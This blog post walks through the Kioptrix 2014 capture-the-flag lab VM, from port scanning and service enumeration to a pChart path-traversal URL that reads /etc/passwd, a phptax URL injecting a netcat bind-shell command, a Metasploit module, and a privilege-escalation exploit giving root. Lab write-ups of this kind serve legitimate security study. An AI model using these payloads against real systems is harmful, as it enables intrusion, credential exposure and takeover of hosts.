🖥️Walkthrough / Kioptrix Level 2014🖥️

in #security7 years ago

level 5 🐱‍💻

Name: Kioptrix: 2014 (#5)
Date release: 6 Apr 2014
Author: Kioptrix
Series: Kioptrix
Web page: http://www.kioptrix.com/blog/a-new-vm-after-almost-2-years/
Vulnhub: https://www.vulnhub.com/entry/kioptrix-2014-5,62/

🔥 HOST DISCOVERY 🔥

ARP

arp-scan -l


ping

ping 192.168.0.25

so the box doesnt want to respond to an ICMP ping

nmap fast scan

nmap -sS -F -PN 192.168.0.25

so the box is alive with a few ports open lets jump into deeper scans to get a better picture

🔥 PORT SCANNING 🔥

TCP

nmap -sS -A -sC -sV -O -p0- 192.168.0.25 -oA nmap_tcp_full_verOSscript

UDP

nmap -sU -n 192.168.0.25 -oA nmap_udp_def

🔥 SERVICE ENUMERATION 🔥

80 - http

http://192.168.0.20

nikto -h 192.168.0.25:80

page source has some juciy info
pChart 2.1.3

http://192.168.0.25/pChart2.1.3/examples/index.php

8080 - http

http://192.168.0.20:8080

🔥 EXPLOITATION🔥

Using searchsploit we find an exploit that looks usable for pChart

There is a Local File Inclusion vulnerability which looks good to pull out.

passwd file

http://192.168.0.25/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd

at this point i was slowly running out of ideas here so did some google fu.

httpd.conf file

At the bottom of the config we see some bits which suggests we need to change our user agent to connect on port 8080

<VirtualHost *:8080>
    DocumentRoot /usr/local/www/apache22/data2

 <Directory "/usr/local/www/apache22/data2">
  Options Indexes FollowSymLinks
  AllowOverride All
  Order allow,deny
  Allow from env=Mozilla4_browser
 </Directory>

</VirtualHost>

curl has the ability

curl -H "User-Agent:Mozilla/4.0" http://192.168.0.25:8080

curl -H "User-Agent:Mozilla/4.0" http://192.168.0.25:8080/phptax/

too messy lets look at it in Firefox. curl wasnt the best here

First we change the user agent following the advice below

https://superuser.com/questions/98798/how-do-i-change-firefoxs-user-agent-via-aboutconfig

setting the newly created string variable in Firefox
general.useragent.override
to
Mozilla/4.0 (X11; Linux x86_64; rv:10.0) Gecko/20100101 Firefox/10.0.

http://192.168.0.25:8080/phptax/

looks pretty cool

using searchsploit there appears to be a few exploits we can try

exploit: https://www.exploit-db.com/exploits/21665/

hmmm maybe we can poke the webapp to get a bind shell :O

time to build the URL and give it a go

we point it at pfilez 1040

http://192.168.0.25:8080/phptax/index.php?pfilez=1040d1-pg2.tob;nc%20-l%20-v%20-p%2023235%20-e%20/bin/bash;&pdf=make

not sure couldn't get it working sadly so moved on and fired up metasploit

exploit/multi/http/phptax_exec

after setting up and running it we successfully get a shell as user www

🔥PRIV ESCALATION 🔥

after fumbling around in the limited shell and getting information we find a a priv esc exploit

https://www.exploit-db.com/exploits/26368/

netcat was on the machine but was giving me greif. I tried to setup a FTP server but nope.

In the end fetch was available and we was able to move the code over to the box :D

after pulling down the file using gcc to compile it and run

all is well and.......

got root 😎 😎 😎

so lets get the flag

Please follow me @shifty0g

Sort:  

Really cool stuff man, I love how much work you put into this. Thanks, and you're getting a follow.

Thanks.

these things take time sometimes days to beat. Really good puzzle for the technical mind

Coin Marketplace

STEEM 0.21
TRX 0.26
JST 0.040
BTC 101120.17
ETH 3683.12
USDT 1.00
SBD 3.16